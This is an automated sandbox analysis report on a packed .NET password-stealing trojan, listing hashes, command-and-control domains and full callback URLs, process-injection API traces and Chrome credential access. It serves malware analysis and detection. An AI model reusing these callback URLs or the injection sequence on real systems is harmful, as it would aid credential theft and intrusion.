Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 29, 2023, 2:22 p.m.	Nov. 29, 2023, 2:28 p.m.

Size	695.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`5393d9e3a30269ebfed5456bf1304e92`
SHA256	`0fa32bd9031ce39788bc74912def8e1c2c7bb82de8976ee94d2d15fd4c890355`
CRC32	`94BDB26D`
ssdeep	`12288:Aicopox4DGSouPvJpGOtOdxtm540LrLZapN2CHZLu/6F1VJQ5r6Tr5NRzo:AeHDbuxtGfLIYkk4LNvW`
PDB Path	pzUh.pdb
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

maxziflowzx.exe "C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe"
2636
- maxziflowzx.exe "C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe"
  2848
dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
2932
- firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2136

Name	Response	Post-Analysis Lookup
www.shutlleross.life	A 66.29.142.244	66.29.142.244
www.e-saleshub.quest	A 172.67.172.121 A 104.21.39.249	104.21.39.249
www.pfannen-scholl.info	CNAME pfannen-scholl.info A 81.169.145.160	81.169.145.160
www.zzennsensual.com	A 81.169.145.84 CNAME zzennsensual.com	81.169.145.84
www.cealr.link	A 38.6.177.47	38.6.177.47
www.prospin.click	A 192.99.101.236	192.99.101.236
www.lederjacke24.com	CNAME lederjacke24.com A 81.169.145.166	81.169.145.166
www.canlitinib.com	A 91.195.240.123	91.195.240.123
www.whistle.news	A 84.32.84.32 CNAME whistle.news	84.32.84.32
www.shimakaze-83.cfd
www.alexbruma.com	A 104.21.77.252 A 172.67.214.17	104.21.77.252
www.limooi.net	A 199.59.243.225	199.59.243.225
www.sqlite.org	A 45.33.6.223	45.33.6.223
www.optime19.com	A 96.126.123.244 A 198.58.118.167 A 45.33.30.197 A 45.33.23.183 A 45.79.19.196 A 72.14.185.43 A 72.14.178.174 A 45.33.2.79 A 45.56.79.23 A 45.33.20.235 A 45.33.18.44 A 173.255.194.134	45.33.18.44

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.172.121	Active	Moloch
172.67.214.17	Active	Moloch
192.99.101.236	Active	Moloch
198.58.118.167	Active	Moloch
199.59.243.225	Active	Moloch
38.6.177.47	Active	Moloch
45.33.6.223	Active	Moloch
66.29.142.244	Active	Moloch
81.169.145.160	Active	Moloch
81.169.145.166	Active	Moloch
81.169.145.84	Active	Moloch
84.32.84.32	Active	Moloch
91.195.240.123	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:54883 -> 164.124.101.2:53	2027867	ET INFO Observed DNS Query to .life TLD	Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 66.29.142.244:80	2027876	ET INFO HTTP Request to Suspicious *.life Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 29, 2023, 2:22 p.m.			0	0
IsDebuggerPresent Nov. 29, 2023, 2:22 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

pzUh.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 29, 2023, 2:22 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (18 events)

request	POST http://www.e-saleshub.quest/mg0g/
request	GET http://www.e-saleshub.quest/mg0g/?8cRkdL-h=bJWbZlFCpWjy/9bYbHM6H7ljbRC4b8vPK6lQdtvFTIRbdY1RUFaQDPtKpbiZ1jn13/iERNVq+PXBoNIqG1dC5GacnrVejbGpWc4QdZ0=&r1zVw=7GWQ_-xgU
request	GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
request	GET http://www.sqlite.org/2016/sqlite-dll-win32-x86-3120000.zip
request	GET http://www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
request	GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
request	GET http://www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
request	GET http://www.prospin.click/mg0g/?8cRkdL-h=AMo+Cmk3hXK3yH/KRAxEZqLdKDpgdcehN2HIFp6MhDBnwy4mJAPROf6TTmmTOHloXs1NFvilG7N23QCnTRSKlDKk5HQvSnm6aCYpbZA=&r1zVw=7GWQ_-xgU
request	GET http://www.whistle.news/mg0g/?8cRkdL-h=8R1spc4kaDEWlEJg8vF1k1GCYe1vBR5yYH2nKF+uhpjoaiwnvSPXopyruDnDnxaAhR/ULocc2ys9QPFDsU5IyNPMGvvn4PxhaS8XNMs=&r1zVw=7GWQ_-xgU
request	GET http://www.shutlleross.life/mg0g/?8cRkdL-h=bJn52SPmeJrPy+67E/dcn6LDWlNMaKHrL+hLeIwBYFQegbTEhn+mauNt/7t0vTaKfTZK38m13LQUXcG77GQygy9UzHEWnrwfd1Ppjkk=&r1zVw=7GWQ_-xgU
request	GET http://www.alexbruma.com/mg0g/?8cRkdL-h=TZtAOU2zJBKbLgvHulWrctMijHF9qs7DPKw5qNaDLWK8osbI5ENSukyfV0auBUHllKHlpSsKBSD+iUGqaGCnVjvmwMTcDGlPOxFYPi4=&r1zVw=7GWQ_-xgU
request	GET http://www.cealr.link/mg0g/?8cRkdL-h=IMAy+8ATmNJk+ySFUKxdJzz5Bsi5/gWlpcldbFUltyc7U32aAYy0gH7A0aaej9oqq+Z9qC1a58M4kMl15uIwUbV5PjKosSXhQm7IMFQ=&r1zVw=7GWQ_-xgU
request	GET http://www.zzennsensual.com/mg0g/?8cRkdL-h=UPCCUTLw89vpBj6v0OYIlyH/tXfMYDNHMqKBY3mPNZeldAdbgqjCzRL3PAAnKT02EQ0FoLgccQ5um3bZSYkyx6B1k5qp4LaFV2egdmY=&r1zVw=7GWQ_-xgU
request	GET http://www.canlitinib.com/mg0g/?8cRkdL-h=DCRiVM6IxoWJyptv3NIe0jO5xuFlNfo/UtKdle2BPkU0htusLnDUD8TPrOe6/6WS6xDFuQW1wjE1wfPqEBFmzvzQCsnl689JFcTspE4=&r1zVw=7GWQ_-xgU
request	GET http://www.pfannen-scholl.info/mg0g/?8cRkdL-h=VKVW22dp+OoakfKr7RHo3LVkALqaN8kis3rXbCHUw2XFas+tapQC3hmrWNln/w9IyKLzGXj0H6Jc9XLG0WdMldG9smrNtVeNBxRCR80=&r1zVw=7GWQ_-xgU
request	GET http://www.optime19.com/mg0g/?8cRkdL-h=JX9bRfLOpqNEOOymQR7yk5dab4VR4H7R1nhebZtzBw39xumhyI7GIKzIy7fUqw87BkYQVkkGEP9iK52Y282QYE28HhvkBbptD1a7nt4=&r1zVw=7GWQ_-xgU
request	GET http://www.limooi.net/mg0g/?8cRkdL-h=T3pbsuGJY2WOIN03L8NlN0GJ+TqkEYwtQUA9siqBJMOxPedzPX2dfFDQxyJSNdSDLlyTl9rcnj2vOMPj0R5dBPd/+rOOG0FZdG8LRvc=&r1zVw=7GWQ_-xgU
request	GET http://www.lederjacke24.com/mg0g/?8cRkdL-h=j84N6G19uoXHTItTNbSgysEEiO8RF1s49C/qmX1UIYmvPN38Fpa3o2d2Xt1p2I563r+6lcLmZmkO/3Pzx/pe1VaGqpP7sGftrUNHiSE=&r1zVw=7GWQ_-xgU

Sends data using the HTTP POST Method (1 event)

request

POST http://www.e-saleshub.quest/mg0g/

Allocates read-write-execute memory (usually to unpack itself) (41 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00780000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00355000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0035b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00357000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0034a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00347000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007a9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00346000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002be000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007ae000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007af000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:26 p.m.	process_identifier: 2848 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d30000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:26 p.m.	process_identifier: 2848 region_size: 118784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 29, 2023, 2:26 p.m.	process_identifier: 2932 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02060000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x000abc00', u'virtual_address': u'0x00002000', u'entropy': 7.775866945933122, u'name': u'.text', u'virtual_size': u'0x000abb28'}

entropy

7.77586694593

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00001c00', u'virtual_address': u'0x000ae000', u'entropy': 7.108337817258422, u'name': u'.rsrc', u'virtual_size': u'0x00001b0c'}

entropy

7.10833781726

description

A section with a high entropy has been found

entropy

0.999280057595

description

Overall entropy of this PE file is high

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2848 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264	1	0	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2848 manipulating memory of non-child process 988
NtMapViewOfSection Nov. 29, 2023, 2:26 p.m.	section_handle: 0x0000004c process_identifier: 988 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x04250000 allocation_type: 0 () section_offset: 0 view_size: 19206144 process_handle: 0x00000050	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL]àÀÀÐ@Ð@.textd¾À ` base_address: 0x00400000 process_identifier: 2848 process_handle: 0x00000264	1	1	0
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2848 process_handle: 0x00000264	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL]àÀÀÐ@Ð@.textd¾À ` base_address: 0x00400000 process_identifier: 2848 process_handle: 0x00000264	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2636 called NtSetContextThread to modify thread in remote process 2848
Process injection	Process 2848 called NtSetContextThread to modify thread in remote process 2932
NtSetContextThread Nov. 29, 2023, 2:22 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199616 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 2848	1	0	0
NtSetContextThread Nov. 29, 2023, 2:26 p.m.	registers.eip: 1995571652 registers.esp: 1833176 registers.edi: 0 registers.eax: 497840 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000064 process_identifier: 2932	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2636 resumed a thread in remote process 2848
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2848	1	0	0

Generates some ICMP traffic

File has been identified by 20 AntiVirus engines on VirusTotal as malicious (20 events)

Elastic	malicious (high confidence)
Skyhigh	BehavesLike.Win32.Generic.jc
Sangfor	Suspicious.Win32.Save.a
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	Scr.Malcode!gdn33
APEX	Malicious
Kaspersky	VHO:Trojan-PSW.MSIL.Agensla.gen
Avast	PWSX-gen [Trj]
Sophos	Troj/Krypt-ABH
Google	Detected
Microsoft	Program:Win32/Wacapew.C!ml
ZoneAlarm	VHO:Trojan-PSW.MSIL.Agensla.gen
Cynet	Malicious (score: 100)
Rising	Malware.Obfus/MSIL@AI.84 (RDM.MSIL2:9QWteb8+jc0eXNjgu7zaJg)
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Kryptik.HDZY!tr
AVG	PWSX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_90% (D)

Executed a process and injected code into it, probably while unpacking (17 events)

Time & API	Arguments	Status	Return
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2636	1	0
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2636	1	0
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2636	1	0
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x00000250 suspend_count: 1 process_identifier: 2636	1	0
CreateProcessInternalW Nov. 29, 2023, 2:22 p.m.	thread_identifier: 2852 thread_handle: 0x0000025c process_identifier: 2848 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\maxziflowzx.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000264	1	1
NtGetContextThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x0000025c	1	0
NtAllocateVirtualMemory Nov. 29, 2023, 2:22 p.m.	process_identifier: 2848 region_size: 249856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000264	1	0
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $y =`gó=`gó=`gó¦¨ó:`gó¦ªó<`gó¦«ó<`góRich=`góPEL]àÀÀÐ@Ð@.textd¾À ` base_address: 0x00400000 process_identifier: 2848 process_handle: 0x00000264	1	1
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: base_address: 0x00401000 process_identifier: 2848 process_handle: 0x00000264	1	1
WriteProcessMemory Nov. 29, 2023, 2:22 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2848 process_handle: 0x00000264	1	1
NtSetContextThread Nov. 29, 2023, 2:22 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4199616 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000025c process_identifier: 2848	1	0
NtResumeThread Nov. 29, 2023, 2:22 p.m.	thread_handle: 0x0000025c suspend_count: 1 process_identifier: 2848	1	0
NtMapViewOfSection Nov. 29, 2023, 2:26 p.m.	section_handle: 0x0000004c process_identifier: 988 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x04250000 allocation_type: 0 () section_offset: 0 view_size: 19206144 process_handle: 0x00000050	1	0
NtGetContextThread Nov. 29, 2023, 2:26 p.m.	thread_handle: 0x00000064	1	0
NtSetContextThread Nov. 29, 2023, 2:26 p.m.	registers.eip: 1995571652 registers.esp: 1833176 registers.edi: 0 registers.eax: 497840 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000064 process_identifier: 2932	1	0
NtResumeThread Nov. 29, 2023, 2:27 p.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 2932	1	0
